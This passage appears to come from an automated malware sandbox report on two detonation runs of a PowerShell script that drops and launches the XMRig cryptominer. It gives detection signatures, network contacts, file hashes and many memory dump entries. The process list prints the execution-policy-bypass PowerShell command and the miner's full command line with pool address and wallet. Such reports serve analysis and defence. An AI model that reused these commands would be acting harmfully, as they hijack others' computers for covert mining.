memory/2624-60-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-61-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-62-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-63-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-64-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-65-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-66-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-67-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-68-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-69-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-70-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-71-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-72-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-73-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-74-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-75-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-76-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-77-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-78-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-79-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-80-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-81-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-82-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-83-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-84-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-85-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-86-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-87-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-88-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-89-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-90-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-91-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-92-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-93-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-94-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-95-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-96-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-97-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-98-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-99-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-100-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-101-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-102-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-103-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-104-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-105-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-106-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-107-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-108-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-109-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-110-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-111-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-112-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-113-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-114-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-115-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-116-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
memory/2624-117-0x00007FF6E2410000-0x00007FF6E3043000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3272 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3272 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
Files
memory/3272-2-0x00007FF8B8CC3000-0x00007FF8B8CC4000-memory.dmp
memory/3272-5-0x000002A622520000-0x000002A622542000-memory.dmp
memory/3272-8-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
memory/3272-9-0x000002A6226D0000-0x000002A622746000-memory.dmp
memory/3272-10-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qu1jqn11.vr3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3272-25-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
memory/3272-48-0x000002A622860000-0x000002A622872000-memory.dmp
memory/3272-61-0x000002A6226B0000-0x000002A6226BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4568-90-0x000001D18F110000-0x000001D18F130000-memory.dmp
memory/3272-91-0x00007FF8B8CC3000-0x00007FF8B8CC4000-memory.dmp
memory/3272-92-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
memory/4568-93-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/3272-94-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
memory/4568-95-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-96-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-97-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-98-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-99-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-100-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-101-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-102-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-103-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-104-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-105-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-106-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-107-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-108-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-109-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-110-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-111-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-112-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-113-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-114-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-115-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-116-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-117-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-118-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-119-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-120-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-121-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-122-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-123-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-124-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-125-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-126-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-127-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-128-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-129-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-130-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-131-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-132-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-133-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-134-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-135-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-136-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-137-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-138-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-139-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-140-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-141-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-142-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-143-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-144-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-145-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-146-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-147-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-148-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-149-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-150-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-151-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-152-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-153-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-154-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-155-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-156-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:03
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4952 wrote to memory of 532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4952 wrote to memory of 532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/4952-0-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp
memory/4952-1-0x000001E92F580000-0x000001E92F5A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4e3dorbb.s4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4952-11-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-12-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-14-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-15-0x000001E92F710000-0x000001E92F722000-memory.dmp
memory/4952-16-0x000001E92F6F0000-0x000001E92F6FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/532-47-0x00000186CE410000-0x00000186CE430000-memory.dmp
memory/532-48-0x00000186CE460000-0x00000186CE480000-memory.dmp
memory/532-49-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-51-0x00000186CE4A0000-0x00000186CE4C0000-memory.dmp
memory/532-50-0x00000186CE480000-0x00000186CE4A0000-memory.dmp
memory/4952-54-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/532-52-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/4952-53-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp
memory/532-55-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/4952-56-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/532-57-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-59-0x00000186CE4A0000-0x00000186CE4C0000-memory.dmp
memory/532-58-0x00000186CE480000-0x00000186CE4A0000-memory.dmp
memory/532-60-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-61-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-62-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-63-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-64-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-65-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-66-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-67-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-68-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-69-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-70-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-71-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-72-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-73-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-74-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-75-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-76-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-77-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-78-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-79-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-80-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-81-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-82-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-83-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-84-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-85-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-86-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-87-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-88-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-89-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-90-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-91-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-92-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-93-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-94-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-95-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-96-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-97-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-98-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-99-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-100-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-101-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-102-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
